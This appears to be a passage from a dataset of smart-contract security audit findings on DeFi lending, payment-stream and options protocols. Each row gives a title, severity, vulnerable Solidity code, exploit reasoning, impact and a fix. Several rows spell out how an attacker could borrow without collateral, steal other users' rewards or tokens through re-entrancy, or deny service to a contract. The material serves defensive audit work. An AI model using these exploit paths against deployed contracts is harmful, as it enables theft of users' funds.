isoUSDLoaned[_collateralAddress][msg.sender];\\n if( loanPrinciple >= _USDToVault){\\n //pay off loan principle first\\n isoUSDLoaned[_collateralAddress][msg.sender] = loanPrinciple - _USDToVault;\\n }\\n else{\\n interestPaid = _USDToVault - loanPrinciple;\\n //loan principle is fully repaid so record this.\\n isoUSDLoaned[_collateralAddress][msg.sender] = 0;\\n }\\n //update mappings with reduced amounts\\n isoUSDLoanAndInterest[_collateralAddress][msg.sender] = isoUSDLoanAndInterest[_collateralAddress][msg.sender] - ((_USDToVault * LOAN_SCALE) / virtualPrice);\\n emit ClosedLoan(msg.sender, _USDToVault, currencyKey, 0);\\n //Now all effects are handled, transfer the assets so we follow CEI pattern\\n _decreaseLoan(_collateralAddress, 0, _USDToVault, interestPaid);\\n}\\n```\\n",User is unable to make partial repayments if their payment does not increase margin enough,"```\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n" +The calculation of ````totalUSDborrowed```` in ````openLoan()```` is not correct,high,"The `openLoan()` function wrongly use `isoUSDLoaned` to calculate `totalUSDborrowed`. Attacker can exploit it to bypass security check and loan isoUSD with no enough collateral.\\nvulnerability point\\n```\\nfunction openLoan(\\n // // rest of code\\n ) external override whenNotPaused \\n {\\n //// rest of code\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, _colAmount\\n + collateralPosted[_collateralAddress][msg.sender]);\\n uint256 totalUSDborrowed = _USDborrowed \\n + (isoUSDLoaned[_collateralAddress][msg.sender] * virtualPrice)/LOAN_SCALE;\\n // @audit should be isoUSDLoanAndInterest[_collateralAddress][msg.sender]\\n require(totalUSDborrowed >= ONE_HUNDRED_DOLLARS, ""Loan Requested too small"");\\n uint256 borrowMargin = (totalUSDborrowed * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD >= borrowMargin, ""Minimum margin not met!"");\\n\\n // // rest of code\\n}\\n```\\n\\nAttack example: <1>Attacker normally loans and produces 10000 isoUSD interest <2>Attacker repays principle but left interest <3>Attacker open a new 10000 isoUSD loan without providing collateral",See Vulnerability Detail,Attacker can loan isoUSD with no enough collateral.,"```\\nfunction openLoan(\\n // // rest of code\\n ) external override whenNotPaused \\n {\\n //// rest of code\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, _colAmount\\n + collateralPosted[_collateralAddress][msg.sender]);\\n uint256 totalUSDborrowed = _USDborrowed \\n + (isoUSDLoaned[_collateralAddress][msg.sender] * virtualPrice)/LOAN_SCALE;\\n // @audit should be isoUSDLoanAndInterest[_collateralAddress][msg.sender]\\n require(totalUSDborrowed >= ONE_HUNDRED_DOLLARS, ""Loan Requested too small"");\\n uint256 borrowMargin = (totalUSDborrowed * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD >= borrowMargin, ""Minimum margin not met!"");\\n\\n // // rest of code\\n}\\n```\\n" +User can steal rewards from other users by withdrawing their Velo Deposit NFTs from other users' depositors,high,"Rewards from staking AMM tokens accumulate to the depositor used to deposit them. The rewards accumulated by a depositor are passed to the owner when they claim. A malicious user to steal the rewards from other users by manipulating other users depositors. Since any NFT of a DepositReceipt can be withdrawn from any depositor with the same DepositReceipt, a malicious user could mint an NFT on their depositor then withdraw in from another user's depositor. The net effect is that that the victims deposits will effectively be in the attackers depositor and they will collect all the rewards.\\n```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n\\nEvery user must create a `Depositor` using `Templater` to interact with vaults and take loans. `Depositor#withdrawFromGauge` allows any user to withdraw any NFT that was minted by the same `DepositReciept`. This is where the issues arises. Since rewards are accumulated to the `Depositor` in which the underlying is staked a user can deposit to their `Depositor` then withdraw their NFT through the `Depositor` of another user's `Depositor` that uses the same `DepositReciept`. The effect is that the tokens will remained staked to the attackers `Depositor` allowing them to steal all the other user's rewards.\\nExample: `User A` and `User B` both create a `Depositor` for the same `DepositReciept`. Both users deposit 100 tokens into their respective `Depositors`. `User B` now calls `withdrawFromGauge` on `Depositor` A. `User B` gets their 100 tokens back and `Depositor B` still has 100 tokens deposited in it. `User B` cannot steal these tokens but they are now collecting the yield on all 100 tokens via `Depositor B` and `User A` isn't getting any rewards at all because `Depositor` A no longer has any tokens deposited into Velodrome gauge.","Depositors should only be able to burn NFTs that they minted. Change DepositReciept_Base#burn to enforce this:\\n```\\n function burn(uint256 _NFTId) external onlyMinter{\\n+ //tokens must be burned by the depositor that minted them\\n+ address depositor = relatedDepositor[_NFTId];\\n+ require(depositor == msg.sender, ""Wrong depositor"");\\n require(_isApprovedOrOwner(msg.sender, _NFTId), ""ERC721: caller is not token owner or approved"");\\n delete pooledTokens[_NFTId];\\n delete relatedDepositor[_NFTId];\\n _burn(_NFTId);\\n }\\n```\\n",Malicious user can steal other user's rewards,"```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n" +Vault_Base_ERC20#_updateVirtualPrice calculates interest incorrectly if updated frequently,medium,"Updating the virtual price of an asset happens in discrete increments of 3 minutes. This is done to reduce the chance of DOS loops. The issue is that it updates the time to an incorrect timestamp. It should update to the truncated 3 minute interval but instead updates to the current timestamp. The result is that the interest calculation can be abused to lower effective interest rate.\\n```\\nfunction _updateVirtualPrice(uint256 _currentBlockTime, address _collateralAddress) internal { \\n ( ,\\n ,\\n ,\\n uint256 interestPer3Min,\\n uint256 lastUpdateTime,\\n uint256 virtualPrice,\\n\\n ) = _getCollateral(_collateralAddress);\\n uint256 timeDelta = _currentBlockTime - lastUpdateTime;\\n //exit gracefully if two users call the function for the same collateral in the same 3min period\\n //@audit increments \\n uint256 threeMinuteDelta = timeDelta / 180; \\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n}\\n```\\n\\n_updateVirtualPrice is used to update the interest calculations for the specified collateral and is always called with block.timestamp. Due to truncation threeMinuteDelta is always rounded down, that is if there has been 1.99 3-minute intervals it will truncate to 1. The issue is that in the collateralBook#vaultUpdateVirtualPriceAndTime subcall the time is updated to block.timestamp (_currentBlockTime).\\nExample: lastUpdateTime = 1000 and block.timestamp (_currentBlockTime) = 1359.\\ntimeDelta = 1359 - 1000 = 359\\nthreeMinuteDelta = 359 / 180 = 1\\nThis updates the interest by only as single increment but pushes the new time forward 359 seconds. When called again it will use 1359 as lastUpdateTime which means that 179 seconds worth of interest have been permanently lost. Users with large loan positions could abuse this to effectively halve their interest accumulation. Given how cheap optimism transactions are it is highly likely this could be exploited profitably with a bot.","Before updating the interest time it should first truncate it to the closest 3-minute interval:\\n```\\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n+ _currentBlockTime = (_currentBlockTime / 180) * 180;\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n```\\n","Interest calculations will be incorrect if they are updated frequently, which can be abused by users with large amounts of debt to halve their accumulated interest","```\\nfunction _updateVirtualPrice(uint256 _currentBlockTime, address _collateralAddress) internal { \\n ( ,\\n ,\\n ,\\n uint256 interestPer3Min,\\n uint256 lastUpdateTime,\\n uint256 virtualPrice,\\n\\n ) = _getCollateral(_collateralAddress);\\n uint256 timeDelta = _currentBlockTime - lastUpdateTime;\\n //exit gracefully if two users call the function for the same collateral in the same 3min period\\n //@audit increments \\n uint256 threeMinuteDelta = timeDelta / 180; \\n if(threeMinuteDelta > 0) {\\n for (uint256 i = 0; i < threeMinuteDelta; i++ ){\\n virtualPrice = (virtualPrice * interestPer3Min) / LOAN_SCALE; \\n }\\n collateralBook.vaultUpdateVirtualPriceAndTime(_collateralAddress, virtualPrice, _currentBlockTime);\\n }\\n}\\n```\\n" +All collateral in Velodrome vault will be permantly locked if either asset in liquidity pair stays outside of min/max price,medium,"The oracles used have a built in safeguard to revert the transaction if the queried asset is outside of a defined price range. The issue with this is that every vault interaction requires the underlying collateral to be valued. If one of the assets in the pair goes outside it's immutable range then the entire vault will be frozen and all collateral will be permanently stuck.\\n```\\nfunction getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, ""Negative Oracle Price"");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , ""Stale pricefeed"");\\n\\n //@audit revert if price is outside of immutable bounds\\n require(signedPrice < _maxPrice, ""Upper price bound breached"");\\n require(signedPrice > _minPrice, ""Lower price bound breached"");\\n uint256 price = uint256(signedPrice);\\n return price;\\n}\\n```\\n\\nThe lines above are called each time and asset is priced. If the oracle returns outside of the predefined range then the transaction will revert.\\n```\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n //@audit contract prices withdraw collateral\\n uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore debts less than $0.001\\n uint256 collateralLeft = totalCollateralValue(_collateralAddress, msg.sender) - colInUSD;\\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(collateralLeft > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n\\nWhen closing a loan the vault attempts to price the users collateral. Since this is the only way for a user to remove collateral is to call closeLoan, if the price of either asset in the LP goes outside of its bounds then all user deposits will be lost.","If a user is closing their entire loan then there is no need to check the value of the withdraw collateral because there is no longer any debt to collateralize. Move the check inside the inequality to allow the closeLoan to always function:\\n```\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n- uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n+ uint256 colInUSD;\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore debts less than $0.001\\n+ uint256 colInUSD = _calculateProposedReturnedCapital(_collateralAddress, _loanNFTs, _partialPercentage);\\n uint256 collateralLeft = totalCollateralValue(_collateralAddress, msg.sender) - colInUSD;\\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(collateralLeft > borrowMargin , ""Remaining debt fails to meet minimum margin!"");\\n }\\n```\\n",Entire vault will be frozen and all collateral will be permanently stuck,"```\\nfunction getOraclePrice(IAggregatorV3 _priceFeed, int192 _maxPrice, int192 _minPrice) public view returns (uint256 ) {\\n (\\n /*uint80 roundID*/,\\n int signedPrice,\\n /*uint startedAt*/,\\n uint timeStamp,\\n /*uint80 answeredInRound*/\\n ) = _priceFeed.latestRoundData();\\n //check for Chainlink oracle deviancies, force a revert if any are present. Helps prevent a LUNA like issue\\n require(signedPrice > 0, ""Negative Oracle Price"");\\n require(timeStamp >= block.timestamp - HEARTBEAT_TIME , ""Stale pricefeed"");\\n\\n //@audit revert if price is outside of immutable bounds\\n require(signedPrice < _maxPrice, ""Upper price bound breached"");\\n require(signedPrice > _minPrice, ""Lower price bound breached"");\\n uint256 price = uint256(signedPrice);\\n return price;\\n}\\n```\\n" +Outstanding loans cannot be closed or liquidated if collateral is paused,high,"When a collateral is paused by governance, `collateralValid` is set to false. This causes closing and liquidating of loans to be impossible, leading to two issues. The first is that users with exist loans are unable to close their loans to recover their collateral. The second is that since debt is impossible to liquidate the protocol could end up being stuck with a lot of bad debt.\\n```\\nfunction pauseCollateralType(\\n address _collateralAddress,\\n bytes32 _currencyKey\\n ) external collateralExists(_collateralAddress) onlyAdmin {\\n require(_collateralAddress != address(0)); //this should get caught by the collateralExists check but just to be careful\\n //checks two inputs to help prevent input mistakes\\n require( _currencyKey == collateralProps[_collateralAddress].currencyKey, ""Mismatched data"");\\n collateralValid[_collateralAddress] = false;\\n collateralPaused[_collateralAddress] = true;\\n}\\n```\\n\\nWhen a collateral is paused `collateralValid[_collateralAddress]` is set to `false`. For `Vault_Lyra` `Vault_Synths` and `Vault_Velo` this will cause `closeLoan` and `callLiquidation` to revert. This traps existing users and prevents liquidations which will result in bad debt for the protocol",Allow liquidations and loan closure when collateral is paused,"Outstanding loans cannot be closed or liquidated, freezing user funds and causing the protocol to take on bad debt","```\\nfunction pauseCollateralType(\\n address _collateralAddress,\\n bytes32 _currencyKey\\n ) external collateralExists(_collateralAddress) onlyAdmin {\\n require(_collateralAddress != address(0)); //this should get caught by the collateralExists check but just to be careful\\n //checks two inputs to help prevent input mistakes\\n require( _currencyKey == collateralProps[_collateralAddress].currencyKey, ""Mismatched data"");\\n collateralValid[_collateralAddress] = false;\\n collateralPaused[_collateralAddress] = true;\\n}\\n```\\n" +increaseCollateralAmount : User is not allowed to increase collateral freely.,medium,"For all the tree type of vault, a user is allowed to increase collateral only if the overall collateral value is higher than the margin value.\\nimo, this restriction may not be needed. anyway user is adding the collateral that could eventually save from liquidation.\\nProtocol will loose advantage due to this restriction.\\nCodes from lyra vault implementation :\\nLine 184\\n```\\n require(colInUSD >= borrowMargin, ""Liquidation margin not met!"");\\n```\\n\\nFor synth - Refer here\\nFor velo - Refer here",Allow user add collateral freely.,"User may not have the collateral all at once, but they can add like an EMI.\\nProtocol will loose the repayment anyway.\\nWhat is no one comes for liquidation - again this could lose.","```\\n require(colInUSD >= borrowMargin, ""Liquidation margin not met!"");\\n```\\n" +Dangerous assumption on the peg of USDC can lead to manipulations,medium,"Dangerous assumption on the peg of USDC can lead to manipulations\\nThe volatility of USDC will also affect the price of the other token in the pool since it's priced in USDC (DepositReceipt_USDC.sol#L87, DepositReceipt_USDC.sol#L110) and then compared to its USD price from a Chainlink oracle (DepositReceipt_USDC.sol#L90-L98).\\nThis issue is also applicable to the hard coded peg of sUSD when evaluating the USD price of a Synthetix collateral (Vault_Synths.sol#L76):\\n```\\n/// @return returns the value of the given synth in sUSD which is assumed to be pegged at $1.\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //As it is a synth use synthetix for pricing\\n return (synthetixExchangeRates.effectiveValue(_currencyKey, _amount, SUSD_CODE)); \\n}\\n```\\n\\nTogether with isoUSD not having a stability mechanism, these assumptions can lead to different manipulations with the price of isoUSD and the arbitraging opportunities created by the hard peg assumptions (sUSD and USDC will be priced differently on exchanges and on Isomorph).","Consider using the Chainlink USDC/USD feed to get the price of USDC and price liquidity using the actual price of USDC. Also, consider converting sUSD prices of Synthetix collaterals to USD to mitigate the discrepancy in prices between external exchanges and Isomorph.","If the price of USDC falls below $1, collateral will be priced higher than expected. This will keep borrowers from being liquidated. And it will probably affect the price of isoUSD since there will be an arbitrage opportunity: the cheaper USDC will be priced higher as collateral on Isomorph. If hte price of USDC raises above $1, borrowers' collateral will be undervalued and some liquidations will be possible that wouldn't have be allowed if the actual price of USDC was used.","```\\n/// @return returns the value of the given synth in sUSD which is assumed to be pegged at $1.\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //As it is a synth use synthetix for pricing\\n return (synthetixExchangeRates.effectiveValue(_currencyKey, _amount, SUSD_CODE)); \\n}\\n```\\n" +Wrong constants for time delay,medium,"This protocol uses several constants for time dealy and some of them are incorrect.\\nIn `isoUSDToken.sol`, `ISOUSD_TIME_DELAY` should be `3 days` instead of 3 seconds.\\n```\\n uint256 constant ISOUSD_TIME_DELAY = 3; // days;\\n```\\n\\nIn `CollateralBook.sol`, `CHANGE_COLLATERAL_DELAY` should be `2 days` instead of 200 seconds.\\n```\\n uint256 public constant CHANGE_COLLATERAL_DELAY = 200; //2 days\\n```\\n",2 constants should be modified as mentioned above.,Admin settings would be updated within a short period of delay so that users wouldn't react properly.,```\\n uint256 constant ISOUSD_TIME_DELAY = 3; // days;\\n```\\n +Unnecessary precision loss in `_recipientBalance()`,medium,"Using `ratePerSecond()` to calculate the `_recipientBalance()` incurs an unnecessary precision loss.\\nThe current formula in `_recipientBalance()` to calculate the vested amount (balance) incurs an unnecessary precision loss, as it includes div before mul:\\n```\\nbalance = elapsedTime_ * (RATE_DECIMALS_MULTIPLIER * tokenAmount_ / duration) / RATE_DECIMALS_MULTIPLIER\\n```\\n\\nThis can be avoided and the improved formula can also save some gas.",Consdier changing to:\\n```\\nbalance = elapsedTime_ * tokenAmount_ / duration\\n```\\n,Precision loss in `_recipientBalance()`.,```\\nbalance = elapsedTime_ * (RATE_DECIMALS_MULTIPLIER * tokenAmount_ / duration) / RATE_DECIMALS_MULTIPLIER\\n```\\n +The ````Stream```` contract is designed to receive ETH but not implement function for withdrawal,medium,"The `Stream` contract instances can receive ETH but can not withdraw, ETH occasionally sent by users will be stuck in those contracts.\\nShown as the test case, it can receive ETH normally.\\n```\\ncontract StreamReceiveETHTest is StreamTest {\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n function test_receiveETH() public {\\n s = Stream(\\n factory.createStream(\\n payer, recipient, STREAM_AMOUNT, address(token), startTime, stopTime\\n )\\n );\\n\\n vm.deal(payer, 10 ether);\\n vm.prank(payer);\\n (bool success, ) = address(s).call{value: 1 ether}("""");\\n assertEq(success, true);\\n assertEq(address(s).balance, 1 ether);\\n }\\n}\\n```\\n\\nResult\\n```\\nRunning 1 test for test/Stream.t.sol:StreamReceiveETHTest\\n[PASS] test_receiveETH() (gas: 167691)\\nTest result: ok. 1 passed; 0 failed; finished in 1.25ms\\n```\\n",Issue The `Stream` contract is designed to receive ETH but not implement function for withdrawal\\nAdd a `rescueETH()` function which is similar with the existing `rescueERC20()`,See Summary,"```\\ncontract StreamReceiveETHTest is StreamTest {\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n function test_receiveETH() public {\\n s = Stream(\\n factory.createStream(\\n payer, recipient, STREAM_AMOUNT, address(token), startTime, stopTime\\n )\\n );\\n\\n vm.deal(payer, 10 ether);\\n vm.prank(payer);\\n (bool success, ) = address(s).call{value: 1 ether}("""");\\n assertEq(success, true);\\n assertEq(address(s).balance, 1 ether);\\n }\\n}\\n```\\n" +"If the recipient is added to the USDC blacklist, then cancel() does not work",medium,"cancel() will send the vested USDC to the recipient, if the recipient is added to the USDC blacklist, then cancel() will not work\\nWhen cancel() is called, it sends the vested USDC to the recipient and cancels future payments. Consider a scenario where if the payer intends to call cancel() to cancel the payment stream, a malicious recipient can block the address from receiving USDC by adding it to the USDC blacklist (e.g. by doing something malicious with that address, etc.), which prevents the payer from canceling the payment stream and withdrawing future payments\\n```\\n function cancel() external onlyPayerOrRecipient {\\n address payer_ = payer();\\n address recipient_ = recipient();\\n IERC20 token_ = token();\\n\\n uint256 recipientBalance = balanceOf(recipient_);\\n\\n // This zeroing is important because without it, it's possible for recipient to obtain additional funds\\n // from this contract if anyone (e.g. payer) sends it tokens after cancellation.\\n // Thanks to this state update, `balanceOf(recipient_)` will only return zero in future calls.\\n remainingBalance = 0;\\n\\n if (recipientBalance > 0) token_.safeTransfer(recipient_, recipientBalance);\\n```\\n","Issue If the recipient is added to the USDC blacklist, then cancel() does not work\\nInstead of sending tokens directly to the payer or recipient in cancel(), consider storing the number of tokens in variables and having the payer or recipient claim it later",A malicious recipient may prevent the payer from canceling the payment stream and withdrawing future payments,"```\\n function cancel() external onlyPayerOrRecipient {\\n address payer_ = payer();\\n address recipient_ = recipient();\\n IERC20 token_ = token();\\n\\n uint256 recipientBalance = balanceOf(recipient_);\\n\\n // This zeroing is important because without it, it's possible for recipient to obtain additional funds\\n // from this contract if anyone (e.g. payer) sends it tokens after cancellation.\\n // Thanks to this state update, `balanceOf(recipient_)` will only return zero in future calls.\\n remainingBalance = 0;\\n\\n if (recipientBalance > 0) token_.safeTransfer(recipient_, recipientBalance);\\n```\\n" +Adverary can DOS contract by making a large number of deposits/withdraws then removing them all,high,"When a user dequeues a withdraw or deposit it leaves a blank entry in the withdraw/deposit. This entry must be read from memory and skipped when processing the withdraws/deposits which uses gas for each blank entry. An adversary could exploit this to DOS the contract. By making a large number of these blank deposits they could make it impossible to process any auction.\\n```\\n while (_quantity > 0) {\\n Receipt memory deposit = deposits[i];\\n if (deposit.amount == 0) {\\n i++;\\n continue;\\n }\\n if (deposit.amount <= _quantity) {\\n // deposit amount is lesser than quantity use it fully\\n _quantity = _quantity - deposit.amount;\\n usdBalance[deposit.sender] -= deposit.amount;\\n amountToSend = (deposit.amount * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, deposit.amount, amountToSend, i, 0);\\n delete deposits[i];\\n i++;\\n } else {\\n // deposit amount is greater than quantity; use it partially\\n deposits[i].amount = deposit.amount - _quantity;\\n usdBalance[deposit.sender] -= _quantity;\\n amountToSend = (_quantity * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, _quantity, amountToSend, i, 0);\\n _quantity = 0;\\n }\\n }\\n```\\n\\nThe code above processes deposits in the order they are submitted. An adversary can exploit this by withdrawing/depositing a large number of times then dequeuing them to create a larger number of blank deposits. Since these are all zero, it creates a fill or kill scenario. Either all of them are skipped or none. If the adversary makes the list long enough then it will be impossible to fill without going over block gas limit.",Two potential solutions. The first would be to limit the number of deposits/withdraws that can be processed in a single netting. The second would be to allow the owner to manually skip withdraws/deposits by calling an function that increments depositsIndex and withdrawsIndex.,Contract can be permanently DOS'd,"```\\n while (_quantity > 0) {\\n Receipt memory deposit = deposits[i];\\n if (deposit.amount == 0) {\\n i++;\\n continue;\\n }\\n if (deposit.amount <= _quantity) {\\n // deposit amount is lesser than quantity use it fully\\n _quantity = _quantity - deposit.amount;\\n usdBalance[deposit.sender] -= deposit.amount;\\n amountToSend = (deposit.amount * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, deposit.amount, amountToSend, i, 0);\\n delete deposits[i];\\n i++;\\n } else {\\n // deposit amount is greater than quantity; use it partially\\n deposits[i].amount = deposit.amount - _quantity;\\n usdBalance[deposit.sender] -= _quantity;\\n amountToSend = (_quantity * 1e18) / _price;\\n IERC20(crab).transfer(deposit.sender, amountToSend);\\n emit USDCDeposited(deposit.sender, _quantity, amountToSend, i, 0);\\n _quantity = 0;\\n }\\n }\\n```\\n" +resolveQueuedTrades() ERC777 re-enter to steal funds,medium,"_openQueuedTrade() does not follow the “Checks Effects Interactions” principle and may lead to re-entry to steal the funds\\nThe prerequisite is that tokenX is ERC777 e.g. “sushi”\\nresolveQueuedTrades() call _openQueuedTrade()\\nin _openQueuedTrade() call ""tokenX.transfer(queuedTrade.user)"" if (revisedFee < queuedTrade.totalFee) before set queuedTrade.isQueued = false;\\n```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n if (revisedFee < queuedTrade.totalFee) {\\n tokenX.transfer( //***@audit call transfer , if ERC777 , can re-enter ***/\\n queuedTrade.user,\\n queuedTrade.totalFee - revisedFee\\n );\\n }\\n\\n queuedTrade.isQueued = false; //****@audit change state****/\\n }\\n```\\n\\n3.if ERC777 re-enter to #cancelQueuedTrade() to get tokenX back,it can close, because queuedTrade.isQueued still equal true 4. back to _openQueuedTrade() set queuedTrade.isQueued = false 5.so steal tokenX","follow “Checks Effects Interactions”\\n```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n+ queuedTrade.isQueued = false; \\n // Transfer the fee to the target options contract\\n IERC20 tokenX = IERC20(optionsContract.tokenX());\\n tokenX.transfer(queuedTrade.targetContract, revisedFee);\\n\\n- queuedTrade.isQueued = false; \\n emit OpenTrade(queuedTrade.user, queueId, optionId);\\n }\\n```\\n",if tokenX equal ERC777 can steal token,"```\\n function _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n// rest of code\\n if (revisedFee < queuedTrade.totalFee) {\\n tokenX.transfer( //***@audit call transfer , if ERC777 , can re-enter ***/\\n queuedTrade.user,\\n queuedTrade.totalFee - revisedFee\\n );\\n }\\n\\n queuedTrade.isQueued = false; //****@audit change state****/\\n }\\n```\\n" +The `_fee()` function is wrongly implemented in the code,medium,"_fee() function is wrongly implemented in the code so the protocol will get fewer fees and the trader will earn more\\n```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n\\nlet's say we have: `newFee` 100 USDC USDC Decimals is 6 `settlementFeePercentage` is 20% ==> 200\\nThe `unitFee` will be 520_000\\n`amount` = (100 * 1_000_000) / 520_000 `amount` = 192 USDC Which is supposed to be `amount` = 160 USDC",The `_fee()` function needs to calculate the fees in this way\\n```\\ntotal_fee = (5000 * amount)/ (10000 - sf)\\n```\\n,The protocol will earn fees less than expected,"```\\n (uint256 unitFee, , ) = _fees(10**decimals(), settlementFeePercentage);\\n amount = (newFee * 10**decimals()) / unitFee;\\n```\\n" +resolveQueuedTrades is intended to be non atomic but invalid signature can still cause entire transaction to revert,medium,"BufferRouter#resolveQueuedTrades and unlockOptions attempt to be non atomic (i.e. doesn't revert the transaction if one fails) but an invalid signature can still cause the entire transaction to revert, because the ECDSA.recover sub call in _validateSigner can still revert.\\n```\\nfunction _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n address recoveredSigner = ECDSA.recover(digest, signature);\\n return recoveredSigner == publisher;\\n}\\n```\\n\\n_validateSigner can revert at the ECDSA.recover sub call breaking the intended non atomic nature of BufferRouter#resolveQueuedTrades and unlockOptions.","Use a try statement inside _validateSigner to avoid any reverts:\\n```\\n function _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n ) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n- address recoveredSigner = ECDSA.recover(digest, signature);\\n\\n+ try ECDSA.recover(digest, signature) returns (address recoveredSigner) {\\n+ return recoveredSigner == publisher;\\n+ } else {\\n+ return false;\\n+ }\\n }\\n```\\n",BufferRouter#resolveQueuedTrades and unlockOptions don't function as intended if signature is malformed,"```\\nfunction _validateSigner(\\n uint256 timestamp,\\n address asset,\\n uint256 price,\\n bytes memory signature\\n) internal view returns (bool) {\\n bytes32 digest = ECDSA.toEthSignedMessageHash(\\n keccak256(abi.encodePacked(timestamp, asset, price))\\n );\\n address recoveredSigner = ECDSA.recover(digest, signature);\\n return recoveredSigner == publisher;\\n}\\n```\\n" +When private keeper mode is off users can queue orders with the wrong asset,high,"After an order is initiated, it must be filled by calling resolveQueuedTrades. This function validates that the asset price has been signed but never validates that the asset being passed in matches the asset of the queuedTrade. When private keeper mode is off, which is the default state of the contract, this can be abused to cause huge loss of funds.\\n```\\n for (uint32 index = 0; index < params.length; index++) {\\n OpenTradeParams memory currentParams = params[index];\\n QueuedTrade memory queuedTrade = queuedTrades[\\n currentParams.queueId\\n ];\\n bool isSignerVerifed = _validateSigner(\\n currentParams.timestamp,\\n currentParams.asset,\\n currentParams.price,\\n currentParams.signature\\n );\\n // Silently fail if the signature doesn't match\\n if (!isSignerVerifed) {\\n emit FailResolve(\\n currentParams.queueId,\\n ""Router: Signature didn't match""\\n );\\n continue;\\n }\\n if (\\n !queuedTrade.isQueued ||\\n currentParams.timestamp != queuedTrade.queuedTime\\n ) {\\n // Trade has already been opened or cancelled or the timestamp is wrong.\\n // So ignore this trade.\\n continue;\\n }\\n\\n // If the opening time is much greater than the queue time then cancel the trad\\n if (block.timestamp - queuedTrade.queuedTime <= MAX_WAIT_TIME) {\\n _openQueuedTrade(currentParams.queueId, currentParams.price);\\n } else {\\n _cancelQueuedTrade(currentParams.queueId);\\n emit CancelTrade(\\n queuedTrade.user,\\n currentParams.queueId,\\n ""Wait time too high""\\n );\\n }\\n\\n // Track the next queueIndex to be processed for user\\n userNextQueueIndexToProcess[queuedTrade.user] =\\n queuedTrade.userQueueIndex +\\n 1;\\n }\\n```\\n\\nBufferRouter#resolveQueueTrades never validates that the asset passed in for params is the same asset as the queuedTrade. It only validates that the price is the same, then passes the price and queueId to _openQueuedTrade:\\n```\\nfunction _openQueuedTrade(uint256 queueId, uint256 price) internal {\\n QueuedTrade storage queuedTrade = queuedTrades[queueId];\\n IBufferBinaryOptions optionsContract = IBufferBinaryOptions(\\n queuedTrade.targetContract\\n );\\n\\n bool isSlippageWithinRange = 